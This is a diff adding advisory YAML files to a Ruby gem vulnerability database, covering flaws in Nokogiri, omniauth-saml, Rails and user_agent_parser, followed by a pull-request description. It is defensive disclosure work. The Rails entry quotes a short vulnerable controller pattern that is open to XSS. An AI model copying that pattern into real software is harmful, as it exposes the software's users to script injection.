+- ">= 1.13.4"
+related:
+  url:
+  - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xxx9-3xcr-gjj3
+  - https://nvd.nist.gov/vuln/detail/CVE-2022-23437
+  - https://github.com/advisories/GHSA-h65f-jvqw-m9fj
+  - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+  - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer
+  - https://github.com/advisories/GHSA-xxx9-3xcr-gjj3
+...
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-xxx9-3xcr-gjj3
+summary: XML Injection in Xerces Java affects Nokogiri
+description: |+
+  ## Summary
+
+  Nokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to 2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437). That CVE is scored as CVSS 6.5 "Medium" on the NVD record.
+
+  Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.
+
+  ## Mitigation
+
+  Upgrade to Nokogiri `>= v1.13.4`.
+
+  ## Impact
+
+  ### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J
+
+  - **Severity**: Medium
+  - **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection)
+  - **Description**: There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.
+  - **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj
+
+severity: MODERATE
+cvss:
+  score: 6.5
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+references:
+- url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xxx9-3xcr-gjj3
+- url: https://nvd.nist.gov/vuln/detail/CVE-2022-23437
+- url: https://github.com/advisories/GHSA-h65f-jvqw-m9fj
+- url: https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+- url: https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer
+- url: https://github.com/advisories/GHSA-xxx9-3xcr-gjj3
+publishedAt: '2022-04-11T21:30:00Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: nokogiri
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 1.13.4"
+  firstPatchedVersion:
+    identifier: 1.13.4
+...

--- a/gems/omniauth-saml/GHSA-cvp8-5r8g-fhvq.yml
+++ b/gems/omniauth-saml/GHSA-cvp8-5r8g-fhvq.yml
@@ -1,0 +1,67 @@
+---
+gem: omniauth-saml
+ghsa: cvp8-5r8g-fhvq
+url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+title: omniauth-saml vulnerable to Improper Verification of Cryptographic Signature
+date: 2024-09-11
+description: "ruby-saml, the dependent SAML gem of omniauth-saml has a signature wrapping
+  vulnerability in <= v1.12.0 and v1.13.0 to v1.16.0 , see https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+  \nAs a result, omniauth-saml created a [new release](https://github.com/omniauth/omniauth-saml/releases)
+  by upgrading ruby-saml to the patched versions v1.17. \n"
+cvss_v3: 10.0
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- "~> 1.10.5"
+- "~> 2.1.2"
+- ">= 2.2.1"
+related:
+  url:
+  - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+  - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
+  - https://github.com/omniauth/omniauth-saml/commit/4274e9d57e65f2dcaae4aa3b2accf831494f2ddd
+  - https://github.com/omniauth/omniauth-saml/commit/6c681fd082ab3daf271821897a40ab3417382e29
+  - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/omniauth-saml/GHSA-cvp8-5r8g-fhvq.yml
+  - https://github.com/advisories/GHSA-cvp8-5r8g-fhvq
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-cvp8-5r8g-fhvq
+summary: omniauth-saml vulnerable to Improper Verification of Cryptographic Signature
+description: "ruby-saml, the dependent SAML gem of omniauth-saml has a signature wrapping
+  vulnerability in <= v1.12.0 and v1.13.0 to v1.16.0 , see https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+  \nAs a result, omniauth-saml created a [new release](https://github.com/omniauth/omniauth-saml/releases)
+  by upgrading ruby-saml to the patched versions v1.17. \n"
+severity: CRITICAL
+cvss:
+  score: 10.0
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+references:
+- url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+- url: https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
+- url: https://github.com/omniauth/omniauth-saml/commit/4274e9d57e65f2dcaae4aa3b2accf831494f2ddd
+- url: https://github.com/omniauth/omniauth-saml/commit/6c681fd082ab3daf271821897a40ab3417382e29
+- url: https://github.com/rubysec/ruby-advisory-db/blob/master/gems/omniauth-saml/GHSA-cvp8-5r8g-fhvq.yml
+- url: https://github.com/advisories/GHSA-cvp8-5r8g-fhvq
+publishedAt: '2024-09-11T21:08:26Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: omniauth-saml
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.2.0, < 2.2.1"
+  firstPatchedVersion:
+    identifier: 2.2.1
+- package:
+    name: omniauth-saml
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 1.10.5"
+  firstPatchedVersion:
+    identifier: 1.10.5
+- package:
+    name: omniauth-saml
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.0.0, < 2.1.2"
+  firstPatchedVersion:
+    identifier: 2.1.2

--- a/gems/rails/CVE-2024-26143.yml
+++ b/gems/rails/CVE-2024-26143.yml
@@ -1,0 +1,119 @@
+---
+gem: rails
+cve: 2024-26143
+ghsa: 9822-6m93-xqf4
+url: https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4
+title: Rails has possible XSS Vulnerability in Action Controller
+date: 2024-02-27
+description: "# Possible XSS Vulnerability in Action Controller\n\nThere is a possible
+  XSS vulnerability when using the translation helpers\n(`translate`, `t`, etc) in
+  Action Controller. This vulnerability has been\nassigned the CVE identifier CVE-2024-26143.\n\nVersions
+  Affected:  >= 7.0.0.\nNot affected:       < 7.0.0\nFixed Versions:     7.1.3.1,
+  7.0.8.1\n\nImpact\n------\nApplications using translation methods like `translate`,
+  or `t` on a\ncontroller, with a key ending in \"_html\", a `:default` key which
+  contains\nuntrusted user input, and the resulting string is used in a view, may
+  be\nsusceptible to an XSS vulnerability.\n\nFor example, impacted code will look
+  something like this:\n\n```ruby\nclass ArticlesController < ApplicationController\n
+  \ def show  \n    @message = t(\"message_html\", default: untrusted_input)\n    #
+  The `show` template displays the contents of `@message`\n  end\nend\n```\n\nTo reiterate
+  the pre-conditions, applications must:\n\n* Use a translation function from a controller
+  (i.e. _not_ I18n.t, or `t` from\n  a view)\n* Use a key that ends in `_html`\n*
+  Use a default value where the default value is untrusted and unescaped input\n*
+  Send the text to the victim (whether that's part of a template, or a\n  `render`
+  call)\n\nAll users running an affected release should either upgrade or use one
+  of the\nworkarounds immediately.\n\nReleases\n--------\nThe fixed releases are available
+  at the normal locations.\n\nWorkarounds\n-----------\nThere are no feasible workarounds
+  for this issue.\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately
+  we have provided patches for\nthe two supported release series. They are in git-am
+  format and consist of a\nsingle changeset.\n\n*  7-0-translate-xss.patch - Patch
+  for 7.0 series\n*  7-1-translate-xss.patch - Patch for 7.1 series\n\nCredits\n-------\n\nThanks
+  to [ooooooo_q](https://hackerone.com/ooooooo_q) for the patch and fix!"
+cvss_v3: 6.1
+cvss_v4: "<FILL IN IF AVAILABLE>"
+unaffected_versions:
+- "< 7.0.0"
+patched_versions:
+- "~> 7.0.8.1"
+- ">= 7.1.3.1"
+related:
+  url:
+  - https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4
+  - https://nvd.nist.gov/vuln/detail/CVE-2024-26143
+  - https://github.com/rails/rails/commit/4c83b331092a79d58e4adffe4be5f250fa5782cc
+  - https://github.com/rails/rails/commit/5187a9ef51980ad1b8e81945ebe0462d28f84f9e
+  - https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947
+  - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26143.yml
+  - https://security.netapp.com/advisory/ntap-20240510-0004
+  - https://github.com/advisories/GHSA-9822-6m93-xqf4
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-9822-6m93-xqf4
+- type: CVE
+  value: CVE-2024-26143
+summary: Rails has possible XSS Vulnerability in Action Controller
+description: "# Possible XSS Vulnerability in Action Controller\n\nThere is a possible
+  XSS vulnerability when using the translation helpers\n(`translate`, `t`, etc) in
+  Action Controller. This vulnerability has been\nassigned the CVE identifier CVE-2024-26143.\n\nVersions
+  Affected:  >= 7.0.0.\nNot affected:       < 7.0.0\nFixed Versions:     7.1.3.1,
+  7.0.8.1\n\nImpact\n------\nApplications using translation methods like `translate`,
+  or `t` on a\ncontroller, with a key ending in \"_html\", a `:default` key which
+  contains\nuntrusted user input, and the resulting string is used in a view, may
+  be\nsusceptible to an XSS vulnerability.\n\nFor example, impacted code will look
+  something like this:\n\n```ruby\nclass ArticlesController < ApplicationController\n
+  \ def show  \n    @message = t(\"message_html\", default: untrusted_input)\n    #
+  The `show` template displays the contents of `@message`\n  end\nend\n```\n\nTo reiterate
+  the pre-conditions, applications must:\n\n* Use a translation function from a controller
+  (i.e. _not_ I18n.t, or `t` from\n  a view)\n* Use a key that ends in `_html`\n*
+  Use a default value where the default value is untrusted and unescaped input\n*
+  Send the text to the victim (whether that's part of a template, or a\n  `render`
+  call)\n\nAll users running an affected release should either upgrade or use one
+  of the\nworkarounds immediately.\n\nReleases\n--------\nThe fixed releases are available
+  at the normal locations.\n\nWorkarounds\n-----------\nThere are no feasible workarounds
+  for this issue.\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately
+  we have provided patches for\nthe two supported release series. They are in git-am
+  format and consist of a\nsingle changeset.\n\n*  7-0-translate-xss.patch - Patch
+  for 7.0 series\n*  7-1-translate-xss.patch - Patch for 7.1 series\n\nCredits\n-------\n\nThanks
+  to [ooooooo_q](https://hackerone.com/ooooooo_q) for the patch and fix!"
+severity: MODERATE
+cvss:
+  score: 6.1
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+references:
+- url: https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4
+- url: https://nvd.nist.gov/vuln/detail/CVE-2024-26143
+- url: https://github.com/rails/rails/commit/4c83b331092a79d58e4adffe4be5f250fa5782cc
+- url: https://github.com/rails/rails/commit/5187a9ef51980ad1b8e81945ebe0462d28f84f9e
+- url: https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947
+- url: https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26143.yml
+- url: https://security.netapp.com/advisory/ntap-20240510-0004
+- url: https://github.com/advisories/GHSA-9822-6m93-xqf4
+publishedAt: '2024-02-27T21:41:12Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: rails
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 7.1.0, < 7.1.3.1"
+  firstPatchedVersion:
+    identifier: 7.1.3.1
+- package:
+    name: rails
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 7.0.0, < 7.0.8.1"
+  firstPatchedVersion:
+    identifier: 7.0.8.1
+- package:
+    name: actionpack
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 7.1.0, < 7.1.3.1"
+  firstPatchedVersion:
+    identifier: 7.1.3.1
+- package:
+    name: actionpack
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 7.0.0, < 7.0.8.1"
+  firstPatchedVersion:
+    identifier: 7.0.8.1

--- a/gems/user_agent_parser/GHSA-pcqq-5962-hvcw.yml
+++ b/gems/user_agent_parser/GHSA-pcqq-5962-hvcw.yml
@@ -1,0 +1,63 @@
+---
+gem: user_agent_parser
+ghsa: pcqq-5962-hvcw
+url: https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
+title: Denial of Service in uap-core when processing crafted User-Agent strings
+date: 2020-03-10
+description: |-
+  ### Impact
+  Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings.
+
+  ### Patches
+  Please update `uap-ruby` to &gt;= v2.6.0
+
+  ### For more information
+  https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p
+
+  Reported in `uap-core` by Ben Caller @bcaller
+cvss_v3: "<FILL IN IF AVAILABLE>"
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- ">= 2.6.0"
+related:
+  url:
+  - https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
+  - https://github.com/ua-parser/uap-ruby/commit/2bb18268f4c5ba7d4ba0e21c296bf6437063da3a
+  - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/user_agent_parser/GHSA-pcqq-5962-hvcw.yml
+  - https://github.com/advisories/GHSA-pcqq-5962-hvcw
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-pcqq-5962-hvcw
+summary: Denial of Service in uap-core when processing crafted User-Agent strings
+description: |-
+  ### Impact
+  Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings.
+
+  ### Patches
+  Please update `uap-ruby` to &gt;= v2.6.0
+
+  ### For more information
+  https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p
+
+  Reported in `uap-core` by Ben Caller @bcaller
+severity: HIGH
+cvss:
+  score: 0.0
+  vectorString:
+references:
+- url: https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw
+- url: https://github.com/ua-parser/uap-ruby/commit/2bb18268f4c5ba7d4ba0e21c296bf6437063da3a
+- url: https://github.com/rubysec/ruby-advisory-db/blob/master/gems/user_agent_parser/GHSA-pcqq-5962-hvcw.yml
+- url: https://github.com/advisories/GHSA-pcqq-5962-hvcw
+publishedAt: '2020-03-10T18:02:49Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: user_agent_parser
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 2.6.0"
+  firstPatchedVersion:
+    identifier: 2.6.0


### PR DESCRIPTION
Gems advised:
*  gems/Autolab/CVE-2024-49376.yml
* gems/avo/CVE-2026-42205.yml
* gems/css_parser/CVE-2026-44312.yml
* gems/erb/CVE-2026-41316.yml
* gems/faraday/CVE-2026-33637.yml
* gems/graphql/GHSA-3h96-34p3-xm76.yml
* gems/iodine/CVE-2026-41146.yml
* gems/jwt/CVE-2026-45363.yml
* gems/loofah/GHSA-2j22-pr5w-6gq8.yml
* gems/nokogiri/GHSA-fq42-c5rg-92c2.yml
* gems/nokogiri/GHSA-gx8x-g87m-h5q6.yml
* gems/nokogiri/GHSA-v6gp-9mmm-c6p5.yml
* gems/nokogiri/GHSA-xxx9-3xcr-gjj3.yml
* gems/omniauth-saml/GHSA-cvp8-5r8g-fhvq.yml
* gems/rails/CVE-2024-26143.yml
* gems/user_agent_parser/GHSA-pcqq-5962-hvcw.yml


> Noticing the missing `CVE-2026-45363`, I ran a complete GitHub sync and found 16 missing gem advisories. 
If those are out of scope or fall under the Rails LTS policy, please let me know.

